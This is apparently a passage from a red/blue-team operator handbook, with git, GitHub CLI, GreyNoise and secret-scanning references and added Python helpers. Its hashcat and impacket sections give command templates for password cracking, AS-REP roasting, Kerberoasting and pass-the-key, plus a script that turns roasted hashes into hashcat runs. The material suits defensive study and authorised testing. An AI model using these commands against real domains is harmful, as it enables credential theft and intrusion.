Symbol Table                                            Window → Symbol Table
Symbol References                                       Window → Symbol References
Symbol Tree                                             Window → Symbol Tree
SEARCH
Search Memory                           S               Search → Memory
Search Program Text                     Ctrl+Shift+E    Search → Program Text
MISC
Select                                                  Select → what
Program Differences                     2               Tools → Program Differences
Rerun Script                            Ctrl+Shift+R
Assemble                                Ctrl+Shift+G    ❖ → Patch Instruction
**❖ indicates the context menu, i.e., right-click.

REFERENCE:
[Link]
[Link]
GIT
ALL ADMINISTRATION SOURCE/DOCUMENTATION

Configure Tooling
Set the name attached to your commit transactions
# git config --global [Link] "[name]"
Set the email attached to your commit transactions
# git config --global [Link] "[email address]"
Enable colorization of command line output
# git config --global [Link] auto

Create Repositories
Turn an existing directory into a git repository
# git init
Clone (download) a repository that already exists, including all of the files, branches, and commits
# git clone [url] or [/path] or [user@host:/path]

Branches
Create a new branch
# git branch [branch-name]
Switch to the specified branch and update the working directory
# git checkout [branch-name]
Combine the specified branch's history into the current branch
# git merge [branch]
Delete the specified branch
# git branch -d [branch-name]
Push branch to remote repository
# git push origin [branch]

Synchronize Changes
Download all history from the remote tracking branches
# git fetch
Combine remote tracking branch into current local branch
# git merge
Upload all local branch commits to GitHub
# git push
Update your current local working branch with all new commits from the remote branch
# git pull

Browse History Changes
List version history for the current branch
# git log
List version history for a file
# git log --follow [file]
Show content differences between two branches
# git diff [branch-1]...[branch-2]
Output metadata and content changes of a commit
# git show [commit]
Snapshot a file in preparation for versioning
# git add [file]
Remove a file from the repository
# git rm [file]
Record file snapshots in permanent version history
# git commit -m "[description text]"

Redo & Restore Commits
Undo all commits after the specified commit, preserving changes locally
# git reset [commit]
Discard all history & changes back to the specified commit
# git reset --hard [commit]
Replace the working copy of a file with the latest from HEAD
# git checkout -- [file]

Terms
git: an open source, distributed version-control system
GitHub: a platform for hosting and collaborating on Git repositories
commit: a Git object, a snapshot of your entire repository compressed into a SHA
branch: a lightweight movable pointer to a commit
clone: a local version of a repository, including all commits and branches
remote: a common repository on GitHub that all team members use to exchange their changes
fork: a copy of a repository on GitHub owned by a different user
pull request: a place to compare and discuss the differences introduced on a branch with reviews, comments, integrated tests, and more
HEAD: represents your current working directory; the HEAD pointer can be moved to different branches, tags, or commits when using git checkout

REFERENCE:
[Link]

GITHUB CLI
ALL ADMINISTRATION SOURCE/DOCUMENTATION
gh is GitHub on the command line and brings pull requests, issues, and other GitHub concepts to the terminal next to where you are already working with git and your code.

# Create an issue interactively
gh issue create

# Create an issue using flags
gh issue create --title "Issue title" --body "Issue body"

# Quickly navigate to the issue creation page
gh issue create --web

# Viewing a list of open issues
gh issue list

# Viewing a list of closed issues assigned to a user
gh issue list --state closed --assignee user

# Viewing issues relevant to you
gh issue status

# Viewing an issue in the browser
gh issue view <issue_number>

# Viewing an issue in terminal
gh issue view <issue_number> --preview

# Check out a pull request in Git (example syntax)
gh pr checkout {<number> | <url> | <branch>} [flags]

# Checking out a pull request locally
gh pr checkout <number>

# Checking out a pull request locally with branch name or URL
gh pr checkout branch-name

# Create a pull request interactively
gh pr create

# Create a pull request using flags
gh pr create --title "Pull request title" --body "Pull request body"

# Quickly navigate to the pull request creation page
gh pr create --web

# Viewing a list of open pull requests
gh pr list

# Viewing a list of closed pull requests assigned to a user
gh pr list --state closed --assignee user

# Viewing the status of your relevant pull requests
gh pr status

# Viewing a pull request in the browser
gh pr view <number>

# Viewing a pull request in terminal
gh pr view <number> --preview

REFERENCE:
[Link]

GITHUB_Exploit
RED/BLUE TEAM ADMINISTRATION EXPOSED SECRETS
It is advantageous to search git repos on GitHub or GitLab for exposed credentials, API keys, and other authentication material.

TRUFFLE HOG
[Link]

STEP 1: pip install truffleHog

STEP 2: Fire at a git repo or local branches:

truffleHog --regex --entropy=False [Link]

truffleHog [Link]

GITROB
Gitrob clones repos to a moderate depth and then iterates through commit histories, flagging files that match potentially sensitive content.
[Link]
[Link]

STEP 1: Download the precompiled gitrob release

STEP 2: Login and generate/copy your GitHub access token:
[Link]

STEP 3: Launch Gitrob in analyze mode

gitrob analyze <username> --site=[Link] --endpoint=[Link] --access-tokens=token1,token2

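Both tools above rest on the same two detections: a regex match against known key formats (truffleHog's --regex) and a Shannon-entropy test on long base64 or hex runs (what --entropy=False switches off). The Python below is an added example, not truffleHog's or Gitrob's code, that implements both over the text of a commit diff so the mechanism, and why it is worth running against your own repositories before an attacker does, is visible. The diff embedded is constructed sample text (the access key id and secret in it are made up); the AWS key-id shape and PEM header are the real, well-known formats, while the entropy thresholds of 4.5 (base64) and 3.0 (hex) and the minimum run length of 20 are this example's choice of truffleHog-style defaults.

```python
import math
import re
from collections import Counter

BASE64_CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
HEX_CHARS = "1234567890abcdefABCDEF"

# Known-format detectors; keep each one tight so the regex pass stays low-noise.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}

# Constructed diff text, as `git show` would print it; every value in it is made up.
SAMPLE_DIFF = """\
+AWS_ACCESS_KEY_ID=AKIAEXAMPLEKEY000001
+AWS_SECRET_ACCESS_KEY=q8Zt3vL0mXp2NdY7kRs9WbC4jHf6GaE1uT5yV
+LOG_LEVEL=debug
+-----BEGIN RSA PRIVATE KEY-----
+# README: this repository is for the website build
"""


def shannon_entropy(s):
    """Bits per character of the string's own symbol distribution (0 for 'aaaa', ~5.3 for random base64)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def _runs(word, alphabet, min_len):
    """Maximal runs of characters drawn from `alphabet`, at least min_len long."""
    runs, cur = [], ""
    for ch in word:
        if ch in alphabet:
            cur += ch
            continue
        if len(cur) >= min_len:
            runs.append(cur)
        cur = ""
    if len(cur) >= min_len:
        runs.append(cur)
    return runs


def high_entropy_strings(text, b64_threshold=4.5, hex_threshold=3.0, min_len=20):
    """Entropy pass: long base64/hex-looking runs whose character mix is close to random."""
    hits = []
    for word in re.split(r"\s+", text):
        for alphabet, threshold in ((BASE64_CHARS, b64_threshold), (HEX_CHARS, hex_threshold)):
            for run in _runs(word, alphabet, min_len):
                if shannon_entropy(run) > threshold:
                    hits.append(run)
    return hits


def scan(text, entropy=True):
    """Regex pass plus (optionally) the entropy pass; returns (kind, matched_text) pairs."""
    findings = [(name, m.group(0)) for name, rx in PATTERNS.items() for m in rx.finditer(text)]
    if entropy:
        findings += [("high_entropy", s) for s in high_entropy_strings(text)]
    return findings


if __name__ == "__main__":
    for kind, value in scan(SAMPLE_DIFF):
        print("%-20s %s" % (kind, value))
```

Run it over a repository with `git log -p | python3 secret_scan.py` after swapping `SAMPLE_DIFF` for `sys.stdin.read()`. The entropy pass catches the made-up secret access key that no regex knows about, while the key id and the PEM header are caught by format alone; the price of the entropy pass is false positives on hashes and minified blobs, which is exactly the trade-off `--entropy=False` makes.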
GREYNOISE
BLUE TEAM THREAT INTEL CLOUD
GreyNoise collects and analyzes untargeted, widespread, and opportunistic scan and attack activity that reaches every server directly connected to the Internet. Mass scanners (such as Shodan and Censys), search engines, bots, worms, and crawlers generate logs and events omnidirectionally on every IP address in the IPv4 space. GreyNoise gives you the ability to filter this useless noise out.
**CLI & WEB UI Available

GREYNOISE CLI
Install the library:
pip install greynoise or python [Link] install
Save your configuration:
greynoise setup --api-key <your-API-key>

#CLI COMMAND OPTIONS
query        Run a GNQL structured query.
account      View information about your GreyNoise account.
alerts       List, create, delete, and manage your GreyNoise alerts.
analyze      Analyze the IP addresses in a log file, stdin, etc.
feedback     Send feedback directly to the GreyNoise team.
filter       Filter the noise from a log file, stdin, etc.
help         Show this message and exit.
interesting  Report one/more IPs as "interesting".
ip           Query for all information on an IP.
pcap         Get PCAP for a given IP address.
quick        Check if one/many IPs are "noise".
repl         Start an interactive shell.
setup        Configure API key.
signature    Submit IDS signature to GreyNoise.
stats        Aggregate stats from a GNQL query.
version      Get version and OS of GreyNoise.

FILTER
Sort the external IPs from a log file (firewall, netflow, DNS, etc.) into a text file, one per line ([Link]). Pipe it to greynoise filter to remove all IPs that are "noise" and return the non-noise IPs:
# cat [Link] | greynoise filter > [Link]

ANALYZE
Sort the external IPs from a log file (firewall, netflow, DNS, etc.) into a text file, one per line ([Link]). Pipe it to greynoise analyze to report every IP's ASN, categories, classifications, countries, operating systems, organizations, and tags:
# cat [Link] | greynoise analyze

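Both FILTER and ANALYZE start from the same preparation step the text leaves to the reader: pulling the external IPs out of raw log lines, one per line, with the internal addresses dropped so they are not sent to the API. The Python below is an added example, not GreyNoise's code, that does that step with a count of how often each address appeared, which is useful on its own for deciding what to look up first. The log lines embedded are constructed samples in a firewall/DNS style, and the list of non-routable ranges is this example's own (it deliberately does not use Python's `is_global`, which would also discard the RFC 5737 documentation ranges the sample uses).

```python
import ipaddress
import re
from collections import OrderedDict

# Constructed log lines in a firewall / DNS style; sample values only, not captured traffic.
SAMPLE_LOG = """\
2020-03-01T10:00:00Z fw DROP src=203.0.113.45 dst=10.0.0.4 proto=tcp dport=445
2020-03-01T10:00:01Z fw DROP src=198.51.100.9 dst=10.0.0.4 proto=tcp dport=22
2020-03-01T10:00:02Z dns query from 192.168.1.20 for example.com A
2020-03-01T10:00:03Z fw DROP src=203.0.113.45 dst=10.0.0.4 proto=tcp dport=3389
2020-03-01T10:00:04Z fw ACCEPT src=127.0.0.1 dst=127.0.0.1 proto=udp dport=53
2020-03-01T10:00:05Z fw DROP src=999.1.1.1 dst=10.0.0.4 proto=tcp dport=80
"""

# Ranges that can never be an Internet scanner's source address; everything else counts as external.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
)]

# A dotted quad that is not glued to further digits or dots (skips "1.2.3.4.5" and version strings).
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def is_external(addr):
    """True for an IPv4 address (str or IPv4Address) outside every non-routable range."""
    addr = ipaddress.IPv4Address(addr)
    return not any(addr in net for net in NON_ROUTABLE)


def external_ip_counts(text):
    """{ip: hit count} for the external IPv4 addresses in `text`, in first-seen order."""
    counts = OrderedDict()
    for token in IPV4_RE.findall(text):
        try:
            addr = ipaddress.IPv4Address(token)
        except ValueError:
            continue  # matched the shape but is not an address, e.g. 999.1.1.1
        if is_external(addr):
            counts[str(addr)] = counts.get(str(addr), 0) + 1
    return counts


def ip_list_file(text):
    """The one-IP-per-line text that gets piped into `greynoise filter` or `greynoise analyze`."""
    return "".join(ip + "\n" for ip in external_ip_counts(text))


if __name__ == "__main__":
    # Usage: python3 external_ips.py < firewall.log > ips.txt ; cat ips.txt | greynoise filter
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOG
    sys.stdout.write(ip_list_file(data))
```

The output file is what the two commands above consume; keeping the counts around (via `external_ip_counts`) lets you check whether the addresses GreyNoise does not recognise as noise are also the ones hitting you hardest, which is the combination worth investigating.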
STATS
Any query you run can be first checked for statistics returned for
that query:
# greynoise stats "ip:[Link]/24 classification:malicious"

#IP DATA
The IP address of the scanning device IP:
# greynoise query "ip:<IPAddr or CIDR>"
# greynoise query "ip:[Link]"
# greynoise query "[Link]/24"

Whether the device has been categorized as unknown, benign, or


malicious:
# greynoise query "classification:<type>"
# greynoise query "classification:malicious"
# greynoise query "ip:[Link]/24 classification:malicious"

The date the device was first observed:


# greynoise query "first_seen:<YYYY-MM-DD>"

85
# greynoise query "first_seen:2019-12-29"
# greynoise query "ip:[Link]/24 first_seen: 2019-12-29"

The date the device was most recently observed:


# greynoise query "last_seen:<YYYY-MM-DD>"
# greynoise query "last_seen:2019-12-30"
# greynoise query "ip:[Link]/24 last_seen:2019-12-30"

The benign actor the device has been associated with, i.e. Shodan,
GoogleBot, BinaryEdge, etc:
# greynoise query "actor:<actor>"
# greynoise query "actor:censys"
# greynoise query "[Link]/16 actor:censys"

A list of the tags the device has been assigned over the past 90
days (GNQL is Lucene-style: a tag that contains a space must be
double-quoted, otherwise the second word is parsed as a separate
free-text term):
# greynoise query "tags:<tag string>"
# greynoise query "tags:avtech"
# greynoise query "tags:avtech [Link]:AS17974"

#METADATA
Whether the device is a business, isp, or hosting:
# greynoise query "[Link]:<category string>"
# greynoise query "[Link]:ISP"
# greynoise query "[Link]:ISP actor:Yandex"

The full name of the country the device is geographically located
in:
# greynoise query "[Link]:<country>"
# greynoise query "[Link]:turkey"
# greynoise query "[Link]:turkey [Link]:mobile"

The two-character country code of the country the device is
geographically located in:
# greynoise query "metadata.country_code:<##>"
# greynoise query "metadata.country_code:RU"
# greynoise query "metadata.country_code:RU classification:benign"

The city the device is geographically located in:
# greynoise query "[Link]:<city string>"
# greynoise query "[Link]:moscow"
# greynoise query '[Link]:moscow tags:"SMB Scanner"'

The organization that owns the network the IP address belongs to:
# greynoise query "[Link]:<string>"
# greynoise query "[Link]:Yandex"
# greynoise query '[Link]:Yandex tags:"DNS Scanner"'

The reverse DNS pointer of the IP:
# greynoise query "[Link]:<dns string>"
# greynoise query "[Link]:*yandex*"
# greynoise query '[Link]:*yandex* tags:"Web Crawler"'

The autonomous system the IP address belongs to:
# greynoise query "[Link]:<AS#####>"
# greynoise query "[Link]:AS17974"
# greynoise query '[Link]:AS17974 [Link]:"PT TELEKOMUNIKASI INDONESIA"'

Whether the device is a known Tor exit node:
# greynoise query "[Link]:<true/false>"
# greynoise query "[Link]:true"
# greynoise query "[Link]:true [Link]:sweden"

#RAW_DATA
The port number(s) the device has been observed scanning:
# greynoise query "raw_data.[Link]:<port number>"
# greynoise query "raw_data.[Link]"
# greynoise query "raw_data.[Link] [Link]:sweden"

The protocol of the port the device has been observed scanning:
# greynoise query "raw_data.[Link]:<tcp/udp>"
# greynoise query "raw_data.[Link]:udp"
# greynoise query "raw_data.[Link]:udp [Link]:china"

Any HTTP paths the device has been observed crawling on the Internet:
# greynoise query "raw_data.[Link]:<path string>"
# greynoise query "raw_data.[Link]:*admin*"
# greynoise query 'raw_data.[Link]:*admin* tags:"Jboss Worm"'

Any HTTP user-agents the device has been observed using while
crawling the Internet:
# greynoise query "raw_data.[Link]:<UA string>"
# greynoise query 'raw_data.[Link]:"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"'
# greynoise query 'raw_data.[Link]:*baidu* [Link]:"Hong Kong"'

JA3 fingerprint of the TLS negotiation between client and server
([Link] & [Link]):
# greynoise query "raw_data.[Link]:<JA3 fingerprint hash>"
# greynoise query "raw_data.[Link]:6734f37431670b3ab4292b8f60f29984"
# greynoise query "raw_data.[Link]:6734f37431670b3ab4292b8f60f29984 [Link]:china"

GREYNOISE WEB UI
[Link]

#IP DATA
The IP address of the scanning device:
> ip or cidr
> [Link]
> [Link]/24

Whether the device has been categorized as unknown, benign, or
malicious:
> classification:<type>
> classification:malicious
> [Link]/24 classification:malicious

The date the device was first observed:
> first_seen:<YYYY-MM-DD>
> first_seen:2019-12-29
> [Link]/24 first_seen:2019-12-29

The date the device was most recently observed:
> last_seen:<YYYY-MM-DD>
> last_seen:2019-12-30
> [Link]/24 last_seen:2019-12-30

The benign actor the device has been associated with, i.e. Shodan,
GoogleBot, BinaryEdge, etc:
> actor:<actor>
> actor:censys
> [Link]/16 actor:censys

A list of the tags the device has been assigned over the past 90
days (double-quote tag names that contain spaces):
> tags:<tag string>
> tags:avtech
> tags:avtech [Link]:AS17974

#METADATA
Whether the device is a business, isp, or hosting:
> [Link]:<category string>
> [Link]:ISP
> [Link]:ISP actor:Yandex

The full name of the country the device is geographically located
in:
> [Link]:<country>
> [Link]:turkey
> [Link]:turkey [Link]:mobile

The two-character country code of the country the device is
geographically located in:
> metadata.country_code:<##>
> metadata.country_code:RU
> metadata.country_code:RU classification:benign

The city the device is geographically located in:
> [Link]:<city string>
> [Link]:moscow
> [Link]:moscow tags:"SMB Scanner"

The organization that owns the network the IP address belongs to:
> [Link]:<string>
> [Link]:Yandex
> [Link]:Yandex tags:"DNS Scanner"

The reverse DNS pointer of the IP:
> [Link]:<dns string>
> [Link]:*yandex*
> [Link]:*yandex* tags:"Web Crawler"

The autonomous system the IP address belongs to:
> [Link]:<AS#####>
> [Link]:AS17974
> [Link]:AS17974 [Link]:"PT TELEKOMUNIKASI INDONESIA"

Whether the device is a known Tor exit node:
> [Link]:<true/false>
> [Link]:true
> [Link]:true [Link]:sweden

#RAW_DATA
The port number(s) the device has been observed scanning:
> raw_data.[Link]:<port number>
> raw_data.[Link]
> raw_data.[Link] [Link]:sweden

The protocol of the port the device has been observed scanning:
> raw_data.[Link]:<tcp/udp>
> raw_data.[Link]:udp
> raw_data.[Link]:udp [Link]:china

Any HTTP paths the device has been observed crawling on the Internet:
> raw_data.[Link]:<path string>
> raw_data.[Link]:*admin*
> raw_data.[Link]:*admin* tags:"Jboss Worm"

Any HTTP user-agents the device has been observed using while
crawling the Internet:
> raw_data.[Link]:<UA string>
> raw_data.[Link]:"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)"
> raw_data.[Link]:*baidu* [Link]:"Hong Kong"

JA3 fingerprint of the TLS negotiation between client and server
([Link] & [Link]):
> raw_data.[Link]:<JA3 fingerprint hash>
> raw_data.[Link]:6734f37431670b3ab4292b8f60f29984
> raw_data.[Link]:6734f37431670b3ab4292b8f60f29984 [Link]:china
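
The queries above answer one operational question: of the source IPs in
my alerts, which ones is GreyNoise already seeing scan the whole
Internet, and which are talking only to me? The script below is an
added example, not code from the Operator Handbook or from GreyNoise.
It builds GNQL query strings with correct phrase quoting (the CLI and
Web UI sections above both depend on it) and triages a list of alert
IPs against GNQL-style results. The GNQL field names it uses
(metadata.country, raw_data.web.useragents) are taken from GreyNoise's
documented field list; the result records and alert IPs are constructed.

```python
"""Triage alert source IPs against GreyNoise-style context records.

Added example; not code from the Operator Handbook or from GreyNoise.
Records follow the GNQL result shape (ip, classification, actor, tags,
metadata.*). All records and IPs below are constructed, not API output.
"""
import ipaddress
import json

# Constructed GNQL results: one benign scanner, one malicious scanner,
# one unclassified scanner. Not real GreyNoise data.
SAMPLE_RESULTS_JSON = json.dumps([
    {"ip": "198.51.100.10", "classification": "benign", "actor": "Censys",
     "tags": ["Web Crawler"], "metadata": {"organization": "Censys, Inc."}},
    {"ip": "203.0.113.7", "classification": "malicious", "actor": "unknown",
     "tags": ["SMB Scanner", "Mirai"], "metadata": {"organization": "Example ISP"}},
    {"ip": "192.0.2.55", "classification": "unknown", "actor": "unknown",
     "tags": ["Web Crawler"], "metadata": {"organization": "Example Hosting"}},
])


def gnql(terms):
    """Build a GNQL query from (field, value) pairs.

    GNQL is Lucene-style: a value containing whitespace is a phrase and
    must be double-quoted (tags:"SMB Scanner"), otherwise 'Scanner' is
    parsed as a separate free-text term. Wildcards (*baidu*) stay bare.
    """
    parts = []
    for field, value in terms:
        value = str(value)
        if any(ch.isspace() for ch in value):
            value = '"' + value.replace('"', '\\"') + '"'
        parts.append(f"{field}:{value}")
    return " ".join(parts)


def load_results(text):
    """Parse a GNQL JSON result list and index it by IP."""
    return {rec["ip"]: rec for rec in json.loads(text)}


def triage(alert_ips, by_ip):
    """Bucket alert sources by what GreyNoise knows about them.

    targeted        GreyNoise has never seen the IP mass-scanning, so it
                    is talking to you specifically: first to investigate.
    benign_noise    known good actors (Censys, Shodan, ...): suppress.
    malicious_noise opportunistic Internet-wide scanners: block, but
                    they are not aimed at you.
    unknown_noise   seen scanning, not yet classified: review.
    """
    buckets = {"targeted": [], "benign_noise": [], "malicious_noise": [], "unknown_noise": []}
    for ip in alert_ips:
        ipaddress.ip_address(ip)  # raises ValueError on garbage input
        rec = by_ip.get(ip)
        if rec is None:
            buckets["targeted"].append(ip)
        elif rec.get("classification") == "benign":
            buckets["benign_noise"].append(ip)
        elif rec.get("classification") == "malicious":
            buckets["malicious_noise"].append(ip)
        else:
            buckets["unknown_noise"].append(ip)
    return buckets


def tagged_with(by_ip, tag):
    """IPs whose tag list contains `tag` (the same question as tags:"..." in GNQL)."""
    return sorted(ip for ip, rec in by_ip.items() if tag in rec.get("tags", []))


if __name__ == "__main__":
    index = load_results(SAMPLE_RESULTS_JSON)
    print(gnql([("metadata.country", "china"), ("tags", "SMB Scanner")]))
    print(triage(["198.51.100.10", "203.0.113.7", "192.0.2.55", "203.0.113.200"], index))
```

Feed `triage()` the JSON that `greynoise query ... -f json` (or the Web
UI export) returns for your alert IPs; the "targeted" bucket is the
short list worth an analyst's time.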

REFERENCE:
[Link]
[Link]
[Link]

HASHCAT
RED TEAM PASSWORD CRACKING ALL
Hashcat is the world's fastest and most advanced password recovery
utility.

ATTACK MODES
DICTIONARY ATTACK
hashcat -a 0 -m #type [Link] [Link]
DICTIONARY + RULES ATTACK
hashcat -a 0 -m #type [Link] [Link] -r [Link]
COMBINATION ATTACK
hashcat -a 1 -m #type [Link] [Link] [Link]
MASK ATTACK
hashcat -a 3 -m #type [Link] ?a?a?a?a?a?a
HYBRID DICTIONARY + MASK
hashcat -a 6 -m #type [Link] [Link] ?a?a?a?a
HYBRID MASK + DICTIONARY
hashcat -a 7 -m #type [Link] ?a?a?a?a [Link]

RULES
RULEFILE -r
hashcat -a 0 -m #type [Link] [Link] -r [Link]
MANIPULATE LEFT -j
hashcat -a 1 -m #type [Link] left_dict.txt right_dict.txt -j
<option>
MANIPULATE RIGHT -k
hashcat -a 1 -m #type [Link] left_dict.txt right_dict.txt -k
<option>

INCREMENT
DEFAULT INCREMENT (every length from 1 up to the full mask length)
hashcat -a 3 -m #type [Link] ?a?a?a?a?a --increment
INCREMENT MINIMUM LENGTH (--increment-min/--increment-max are only
accepted together with --increment)
hashcat -a 3 -m #type [Link] ?a?a?a?a?a --increment --increment-min=4
INCREMENT MAX LENGTH
hashcat -a 3 -m #type [Link] ?a?a?a?a?a?a --increment --increment-max=5

MISC
BENCHMARK TEST (HASH TYPE)
hashcat -b -m #type
SHOW EXAMPLE HASH
hashcat -m #type --example-hashes
ENABLE OPTIMIZED KERNELS (Warning: limits the maximum password length;
hashcat prints the limit for the hash type at start-up)
hashcat -a 0 -m #type -O [Link] [Link]
ENABLE SLOW CANDIDATES (For fast hashes w/ small [Link] + rules)
hashcat -a 0 -m #type -S [Link] [Link]
SESSION NAME
hashcat -a 0 -m #type --session <uniq_name> [Link] [Link]
SESSION RESTORE (--restore replays the saved command line; do not
repeat the other options, hashcat rejects the combination)
hashcat --session <uniq_name> --restore
SHOW KEYSPACE
hashcat -a 0 -m #type --keyspace [Link] [Link] -r [Link]
OUTPUT RESULTS FILE -o
hashcat -a 0 -m #type -o [Link] [Link] [Link]
CUSTOM CHARSET -1 -2 -3 -4
hashcat -a 3 -m #type [Link] -1 ?l?u -2 ?l?d?s ?1?2?a?d?u?l
ADJUST PERFORMANCE -w
hashcat -a 0 -m #type -w <1-4> [Link] [Link]
KEYBOARD LAYOUT MAPPING
hashcat -a 0 -m #type --keyb=[Link] [Link] [Link]
HASHCAT BRAIN (Local Server & Client)
(Terminal #1) hashcat --brain-server (copy password generated)
(Terminal #2) hashcat -a 0 -m #type -z --brain-password <password>
[Link] [Link]

BASIC ATTACK METHODOLOGY


1- DICTIONARY ATTACK
hashcat -a 0 -m #type [Link] [Link]
2- DICTIONARY + RULES
hashcat -a 0 -m #type [Link] [Link] -r [Link]
3- HYBRID ATTACKS
hashcat -a 6 -m #type [Link] [Link] ?a?a?a?a
4- BRUTEFORCE
hashcat -a 3 -m #type [Link] ?a?a?a?a?a?a?a?a

ICS / SCADA TOOLS
RED/BLUE TEAM EXPLOIT/DEFEND ICS/SCADA

AWESOME-INDUSTRIAL-CONTROL-SYSTEM-SECURITY
A curated list of resources related to Industrial Control System
(ICS) security.
[Link]
security

INTERNET EXCHANGE POINTS
ALL INFORMATIONAL N/A

DATABASE OF GLOBAL INTERNET EXCHANGE POINTS
[Link]
[Link]
[Link]

IMPACKET
RED TEAM ESCALATE PRIVS WINDOWS
Impacket is a collection of Python classes for working with network
protocols. Impacket is focused on providing low-level programmatic
access to the packets and for some protocols (e.g. SMB1-3 and
MSRPC) the protocol implementation itself.

ASREPRoast
[Link]:
# check ASREPRoast for all domain users (credentials required)
python [Link] <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required; only
# accounts with "Do not require Kerberos preauthentication" set will
# return an AS-REP)
python [Link] <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Kerberoasting
[Link]:
# -request actually asks for the service tickets; without it the tool
# only lists the SPNs
python [Link] <domain_name>/<domain_user>:<domain_user_password> -request -outputfile <output_TGSs_file>
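
Both output files above go straight to hashcat, but hashcat takes one
-m per run and a domain with AES-only service accounts mixes etype 23
and etype 18 lines in the same file. The script below is an added
example, not impacket's or hashcat's code: it parses the lines impacket
writes in hashcat format, groups them by the hashcat mode they need
(18200 AS-REP etype 23; 13100, 19600, 19700 for TGS-REP etype 23, 17,
18) and emits one command per group. The line shapes follow impacket's
hashcat output; the hex in the sample lines is constructed filler.
Whether your hashcat build expects the *spn* segment for etype 17/18
lines is worth checking against `hashcat -m 19700 --example-hashes`.

```python
"""Sort impacket AS-REP roast / Kerberoast output into hashcat modes.

Added example; not impacket's or hashcat's code. Line shapes are those
impacket writes with -format hashcat / -outputfile:
  AS-REP   : $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<edata>
  TGS 23   : $krb5tgs$23$*<user>$<REALM>$<spn>*$<checksum>$<edata>
  TGS 17/18: $krb5tgs$<etype>$<user>$<REALM>$*<spn>*$<checksum>$<edata>
The hex in SAMPLE_LINES is constructed filler, not real ciphertext.
"""
import re
from collections import defaultdict
from pathlib import Path

# hashcat -m for each (ticket kind, Kerberos etype); one -m per hashcat run.
HASHCAT_MODE = {
    ("asrep", 23): 18200,  # Kerberos 5, etype 23, AS-REP
    ("tgs", 23): 13100,    # Kerberos 5, etype 23, TGS-REP
    ("tgs", 17): 19600,    # Kerberos 5, etype 17 (AES128-CTS), TGS-REP
    ("tgs", 18): 19700,    # Kerberos 5, etype 18 (AES256-CTS), TGS-REP
}

HEX = r"[0-9a-fA-F]+"
PATTERNS = (
    ("asrep", re.compile(
        r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
        rf"(?P<checksum>{HEX})\$(?P<edata>{HEX})$")),
    ("tgs", re.compile(
        r"^\$krb5tgs\$(?P<etype>23)\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*\$"
        rf"(?P<checksum>{HEX})\$(?P<edata>{HEX})$")),
    ("tgs", re.compile(
        r"^\$krb5tgs\$(?P<etype>1[78])\$(?P<user>[^$]+)\$(?P<realm>[^$]+)"
        r"(?:\$\*(?P<spn>[^*]+)\*)?"
        rf"\$(?P<checksum>{HEX})\$(?P<edata>{HEX})$")),
)

# Constructed sample output: one AS-REP, one RC4 TGS, one AES256 TGS, one junk line.
SAMPLE_LINES = [
    "$krb5asrep$23$svc_backup@CORP.LOCAL:" + "0" * 32 + "$" + "1" * 64,
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/db01.corp.local~1433*$" + "2" * 32 + "$" + "3" * 64,
    "$krb5tgs$18$svc_web$CORP.LOCAL$*HTTP/web01.corp.local*$" + "4" * 24 + "$" + "5" * 64,
    "not a hash",
]


def parse_line(line):
    """Return kind/etype/user/realm/spn/mode for a hash line, or None if it is not one."""
    line = line.strip()
    for kind, pattern in PATTERNS:
        m = pattern.match(line)
        if m:
            etype = int(m.group("etype"))
            return {
                "kind": kind, "etype": etype,
                "user": m.group("user"), "realm": m.group("realm"),
                "spn": m.groupdict().get("spn"),
                "mode": HASHCAT_MODE.get((kind, etype)),  # None for combos not in the table
                "line": line,
            }
    return None


def split_by_mode(lines):
    """Group hash lines by hashcat mode; returns (groups, unparsed)."""
    groups, unparsed = defaultdict(list), []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["mode"] is None:
            unparsed.append(line.strip())
        else:
            groups[rec["mode"]].append(rec["line"])
    return dict(groups), unparsed


def hashcat_commands(groups, wordlist="wordlist.txt", rules="best64.rule"):
    """One dictionary+rules command per mode (step 2 of the hashcat methodology above)."""
    return [f"hashcat -a 0 -m {mode} krb_{mode}.txt {wordlist} -r {rules}" for mode in sorted(groups)]


def write_groups(groups, directory):
    """Write each group to krb_<mode>.txt under directory; returns the paths written."""
    paths = []
    for mode, lines in groups.items():
        path = Path(directory) / f"krb_{mode}.txt"
        path.write_text("\n".join(lines) + "\n")
        paths.append(path)
    return paths


if __name__ == "__main__":
    groups, unparsed = split_by_mode(SAMPLE_LINES)
    for cmd in hashcat_commands(groups):
        print(cmd)
    print("unparsed:", unparsed)
```

Run it over the concatenated GetNPUsers and GetUserSPNs output; AES
tickets land in their own file, and anything hashcat would choke on
shows up under "unparsed" instead of aborting the whole run.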

Overpass The Hash/Pass The Key (PTK)
# Request the TGT with hash
python [Link] <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with aesKey
python [Link] <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with password
python [Link] <domain_name>/<user_name>:[password]
# If not provided, the password is prompted for

# Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with any of the following by using the TGT
